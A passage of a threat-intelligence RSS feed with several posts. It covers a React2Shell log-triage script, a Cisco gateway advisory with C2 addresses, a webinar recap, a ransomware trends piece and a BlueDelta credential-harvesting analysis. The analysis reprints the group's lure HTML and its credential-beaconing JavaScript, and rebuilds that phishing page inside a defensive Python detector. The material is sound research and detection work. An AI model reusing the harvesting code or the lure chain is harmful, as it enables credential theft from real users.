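DIGEST_PATTERN = re.compile(r'E\{"digest"')

# Assumption: request headers Next.js sets on Server Action and RSC traffic.
# The page says "Server Actions / RSC endpoints" without naming headers.
RSC_REQUEST_HEADERS = ("next-action", "rsc")


@dataclass
class Finding:
    line_no: int
    severity: str
    reasons: list


def classify(entry: dict) -> list:
    """Indicator names matched by one record."""
    headers = {k.lower(): str(v).lower() for k, v in entry.get("headers", {}).items()}
    reasons = []
    if (entry.get("method", "").upper() == "POST"
            and headers.get("content-type", "").startswith("multipart/form-data")
            and any(h in headers for h in RSC_REQUEST_HEADERS)):
        reasons.append("multipart_post_to_rsc_endpoint")
    if DIGEST_PATTERN.search(entry.get("response_body", "")):
        reasons.append("digest_error_in_response")
    return reasons


def triage(log_lines) -> list:
    """Scan records. Both indicators on one request rate high; one alone rates
    medium, since a digest row also appears on ordinary RSC server errors."""
    findings = []
    for n, raw in enumerate(log_lines, 1):
        if not raw.strip():
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip it and keep scanning
        reasons = classify(entry)
        if reasons:
            findings.append(Finding(n, "high" if len(reasons) == 2 else "medium", reasons))
    return findings


# Constructed sample records (not real traffic; action IDs are placeholders).
SAMPLE_LOG = [
    json.dumps({"method": "GET", "path": "/", "status": 200,
                "headers": {"Accept": "text/html"}, "response_body": "<!doctype html>"}),
    json.dumps({"method": "POST", "path": "/", "status": 500,
                "headers": {"Content-Type": "multipart/form-data; boundary=----x", "Next-Action": "7f3a1c"},
                "response_body": '1:E{"digest":"2811503671"}'}),
    json.dumps({"method": "POST", "path": "/upload", "status": 200,
                "headers": {"Content-Type": "multipart/form-data; boundary=----y", "Next-Action": "b21e90"},
                "response_body": '0:"ok"'}),
    "not json at all",
    json.dumps({"method": "GET", "path": "/dashboard?_rsc=1abc", "status": 500,
                "headers": {"RSC": "1"}, "response_body": '1:E{"digest":"4092661728"}'}),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity} {', '.join(f.reasons)}")
```

        <p>In the constructed sample only the second record, a multipart POST to a Server Action endpoint that also returned a digest error, rates high; the file upload and the failed RSC navigation each match a single indicator and are left for an analyst to confirm against the process review in the last item above.</p>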
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c78e7d8c6ef475aeadada64b85462a8f66332e7c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2025-20393 | Cisco Secure Email Gateway</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by UAT-9686</p>
        <p><strong>Why this matters:</strong> Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.</p>
        <p><strong>Affected products:</strong> Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Cisco's security updates immediately</li>
          <li>Monitor Spam Quarantine web interface access logs</li>
          <li>Check for modifications to <code>/data/web/euq_webui/htdocs/index.py</code></li>
          <li>Hunt for AquaShell, AquaPurge, and AquaTunnel indicators</li>
          <li>Review outbound connections to suspicious IPs</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Practitioners Reveal What Makes Threat Intelligence Programs Mature]]></title>
            <link>https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat intelligence practitioners from Global Payments, Adobe, and Superhuman reveal how mature CTI programs transform data overload into strategic business value. Learn proven approaches to automation, cross-functional collaboration, and executive communication.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Intelligence drives better decisions.</strong> High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.</li>
          <li><strong>Maturity means efficiency.</strong> Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.</li>
          <li><strong>Information overload is the top challenge.</strong> Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.</li>
          <li><strong>AI will reshape the analyst role.</strong> While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.</li>
        </ul>
        <p>Recorded Future recently hosted two webinars to unpack key insights from the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">2025 State of Threat Intelligence Report</a> and hear directly from customers who are putting these findings into practice.</p>
        <p>Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.</p>
        <p>But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.</p>
        <h2>Intelligence as a strategic asset</h2>
        <p>Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”</p>
        <p>Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”</p>
        <p>Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”</p>
        <h2>How threat intelligence delivers organization-wide value</h2>
        <p>Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.</p>
        <p>Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”</p>
        <p>Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”</p>
        <p>Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”</p>
        <h2>The anatomy of a mature threat intelligence program</h2>
        <p>According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.</p>
        <p>“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.</p>
        <p>Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”</p>
        <h2>Pathways to advancing maturity</h2>
        <p>Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”</p>
        <p>Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”</p>
        <h2>Top challenges for CTI teams</h2>
        <p>The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”</p>
        <p>Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.</p>
        <h2>Looking to the future of threat intelligence</h2>
        <p>When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.</p>
        <p>Watch the recordings of the <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/8812722f-c797-43e5-8959-dafb91973948">North America</a> and <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/cd895838-6b18-4d3e-8d02-16287ee95642">EMEA</a> webinar sessions to learn more, and <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">download the 2025 State of Threat Intelligence Report</a> to see how your peers are evaluating, investing in, and operationalizing threat intelligence.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c3dce156d3f3b159e439a8f8b07b4b731d9082a8.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GRU-Linked BlueDelta Evolves Credential Harvesting]]></title>
            <link>https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting</guid>
            <pubDate>Wed, 07 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals how GRU-linked BlueDelta evolved credential-harvesting campaigns targeting government, energy, and research organizations across Europe and Eurasia.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was September 11, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 <a href="https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet">report</a>.</p>
        <p>Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.</p>
        <p>BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.</p>
        <p>BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.</li>
          <li>The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.</li>
          <li>Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.</li>
          <li>BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.</li>
          <li>Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.</p>
        <h3>Microsoft OWA Credential Harvesting</h3>
        <p>On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in <strong>Figure 1</strong>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dd2f28cbdc733be6383fcbe909dac08761bf2bb0.png?width=750&amp;format=png&amp;optimize=medium" width="1372" height="809" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> OWA login-themed credential-harvesting page (Source: Recorded Future)</div>
          </div>
        </div>
        <p>BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL <em>hxxps://shorturl[.]at/Be4Xe</em>. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL <em>hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7</em>. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.</p>
        <p>The initial webhook in this campaign differs from those previously reported by Insikt Group: instead of hosting the credential-harvesting page itself, it serves HTML that loads a PDF lure document in the victim's browser for two seconds before redirecting to a second webhook, as shown in <strong>Figure 2</strong>.</p>
        <div>
          <div>
            <div>
              <pre><code>&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
        &lt;meta name="viewport" content="width=device-width"&gt;
        &lt;meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"&gt;&lt;/object&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 2:</strong></em> <em>HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)</em></p>
        <p>The PDF lure document, shown in <strong>Figure 3</strong>, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a7e9f590d762d7e489a243d9e12bcccb33d79463.png?width=750&amp;format=png&amp;optimize=medium" width="864" height="913" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL <em>hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4</em>, which hosts the spoofed OWA login page shown in <strong>Figure 1</strong>. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.</p>
        <p>As shown in <strong>Figure 4</strong>, BlueDelta has added a hidden HTML form element that stores the current page's URL. The element is populated by JavaScript at page load, as shown in <strong>Figure 5</strong>, and is later read as the exfiltration destination both when the page opens and when credentials are submitted. Because the page posts back to whatever URL it is served from, BlueDelta no longer needs to hard-code an exfiltration URL into each credential-harvesting page, which reduces the administrative effort of standing up new webhooks.</p>
        <div>
          <div>
            <div><code>&lt;input type="hidden" id="href" name="href" role="textbox" aria-labelledby="userNameLabel" value="hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;</code></div>
          </div>
        </div>
        <p><em><strong>Figure 4:</strong></em> <em>Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <pre><code>&lt;script&gt;
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
&lt;/script&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)</em></p>
        <p>The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “<code>u=</code>” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to <code>/owa/</code> to imitate a legitimate OWA login page.</p>
        <p>When the HTML form is submitted, a JavaScript function named <code>myFunction</code> captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in <strong>Figure 6</strong>.</p>
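        <p>The markers described in this section lend themselves to a static triage of captured pages. The following Python is an added example rather than Recorded Future's tooling: it parses a page with the standard-library HTML parser and flags the BlueDelta tradecraft above, namely a short meta-refresh hop to a free webhook or tunnel host, a PDF lure embedded via <code>&lt;object&gt;</code>, a hidden <code>href</code> field filled from <code>window.location.href</code>, the JSON <code>page_opened</code> beacon, the <code>pushState</code> rewrite to <code>/owa/</code>, and a username pre-filled from the <code>u</code> query parameter. The sample pages are constructed from Figures 2, 4 and 5 with placeholder UUIDs and an example.org lure, and the host list is a partial one built from the services named in this report.</p>

```python
"""Static triage of captured credential-harvesting pages for the BlueDelta markers
described above. Added example, not Recorded Future's code; sample pages are
constructed from Figures 2, 4 and 5 with placeholder UUIDs and an example.org lure."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Free hosting / tunnelling services named in the report (partial: the report names
# services, not every domain they serve from). Extend from your own intelligence.
ABUSED_HOST_MARKERS = ("webhook.site", "ngrok", "infinityfree")

def refang(url: str) -> str:
    """Turn report-style defanged URLs (hxxps://a[.]b) back into real ones."""
    return url.replace("hxxp", "http").replace("[.]", ".")

def is_abused_host(url: str) -> bool:
    host = (urlparse(refang(url)).hostname or "").lower()
    return any(marker in host for marker in ABUSED_HOST_MARKERS)

class _Collector(HTMLParser):
    """Collect meta refreshes, PDF <object>s, hidden inputs and inline scripts."""
    def __init__(self):
        super().__init__()
        self.meta_refresh, self.pdf_objects, self.hidden_inputs, self.scripts = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.match(r"\s*(\d+)\s*;\s*url=(.+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh.append((int(m.group(1)), m.group(2).strip()))
        elif tag == "object" and a.get("type", "").lower() == "application/pdf":
            self.pdf_objects.append(a.get("data", ""))
        elif tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden_inputs.append(a.get("id") or a.get("name") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _verdict(matched) -> str:
    return "likely_credential_harvesting" if len(matched) >= 3 else "inconclusive"

def score_page(html: str) -> dict:
    """Indicators one page matches; three or more is treated as a harvesting kit."""
    c = _Collector()
    c.feed(html)
    js = "\n".join(c.scripts)
    hits = {
        "meta_refresh_to_abused_host": any(d <= 5 and is_abused_host(u) for d, u in c.meta_refresh),  # Figure 2
        "pdf_object_lure": bool(c.pdf_objects),  # Figure 2: legitimate PDF rendered as the lure
        "self_populated_exfil_url": "href" in c.hidden_inputs and bool(re.search(  # Figures 4 and 5
            r"getElementById\(['\"]href['\"]\)\.value\s*=\s*window\.location\.href", js)),
        "page_opened_beacon": "XMLHttpRequest" in js and "page_opened" in js,  # Figure 5
        "pushstate_owa_spoof": bool(re.search(r"pushState\([^)]*['\"]/owa/['\"]", js)),  # Figure 5
        "username_from_query_param": "URLSearchParams" in js and bool(re.search(r"\.get\(['\"]u['\"]\)", js)),
    }
    matched = [name for name, hit in hits.items() if hit]
    return {"indicators": matched, "verdict": _verdict(matched)}

def score_chain(pages) -> dict:
    """Union indicators over a redirect chain: the stage-1 lure page alone is weak evidence."""
    seen = []
    for page in pages:
        seen += [i for i in score_page(page)["indicators"] if i not in seen]
    return {"indicators": seen, "verdict": _verdict(seen)}

# Constructed stage-1 page modelled on Figure 2 (placeholder UUID, example lure URL).
STAGE1_HTML = """<html><head><meta charset="utf-8">
<meta http-equiv="refresh" content="2; url=https://webhook.site/00000000-0000-4000-8000-000000000002">
</head><body><object data="https://www.example.org/report.pdf" type="application/pdf"></object></body></html>"""

# Constructed stage-2 page modelled on Figures 4 and 5.
STAGE2_HTML = """<html><body><form><input id="username" name="username">
<input type="password" id="password" name="password"><input type="hidden" id="href" name="href" value=""></form>
<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script></body></html>"""

# Constructed benign login page: a hidden CSRF field but none of the markers.
BENIGN_HTML = """<html><body><form action="/login" method="post"><input name="user"><input type="password" name="pass">
<input type="hidden" name="csrf" value="t0k3n"></form><script>document.querySelector('form').onsubmit = () => true;</script></body></html>"""

if __name__ == "__main__":
    print(score_chain([STAGE1_HTML, STAGE2_HTML]), score_page(BENIGN_HTML))
```

        <p>Scored on its own, the stage-1 page matches only the meta refresh and the PDF object, which is not enough to call it a kit; the verdict belongs to the redirect chain, which is why <code>score_chain</code> unions the indicators across every page fetched from the shortened link onward.</p>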
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_13adafe204e74a6a3976247e1c12b0466f536b86e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[New ransomware tactics to watch out for in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/ransomware-tactics-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ransomware-tactics-2026</guid>
            <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Ransomware groups made less money in 2025 despite a 47% increase in attacks, driving new tactics: bundled DDoS services, insider recruitment, and gig worker exploitation. Learn the emerging trends defenders must prepare for in 2026.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.</li>
          <li>Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.</li>
          <li>Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.</li>
        </ul>
        <h2>The ransomware paradox: More attacks, less money</h2>
        <p>By most accounts, ransomware groups <a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet">made less money</a> in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to <a href="https://www.recordedfuture.com/products/threat-intelligence">Recorded Future Intelligence</a>, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, a 47% increase.</p>
        <p>For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.</p>
        <p>This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.</p>
        <h2>Trend 1: DDoS services return to the RaaS model</h2>
        <p>With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.</p>
        <p>The newly formed <a href="https://blog.talosintelligence.com/new-chaos-ransomware/">Chaos ransomware group</a> (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.</li>
        </ul>
        <h2>Trend 2: Insider recruitment attempts are accelerating</h2>
        <p>Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.</p>
        <p>The most public example came in 2025, when a ransomware group attempted to recruit a <a href="https://www.bbc.com/news/articles/c3w5n903447o">reporter at the BBC</a>. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.</li>
        </ul>
        <h2>Trend 3: Gig workers as unwitting attack vectors</h2>
        <p>According to a recent <a href="https://www.ic3.gov/CSA/2025/250523.pdf">FBI advisory</a>, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.</p>
        <p>The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.</li>
        </ul>
        <h2>Looking ahead: One big prediction for 2026</h2>
        <p>The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.</p>
        <p>Recorded Future believes that 2026 will be the first year the number of <em>new</em> ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.</p>
        <h2>The bottom line: Strengthen your ransomware defenses</h2>
        <p>Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:</p>
        <ul>
          <li><strong>Explore Recorded Future's</strong> <strong><a href="https://www.recordedfuture.com/use-case/ransomware">Ransomware Mitigation Solution</a></strong> for end-to-end visibility into your ransomware exposure across the attack lifecycle.</li>
          <li><strong>Read our latest</strong> <strong><a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group® research</a></strong> on ransomware trends, threat actor TTPs, and emerging attack vectors.</li>
          <li><strong>Download the</strong> <strong><a href="https://www.recordedfuture.com/resources/guides/proactive-ransomware-mitigation">Proactive Ransomware Mitigation eBook</a></strong> for actionable strategies to identify, investigate, and prioritize cyber threats.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
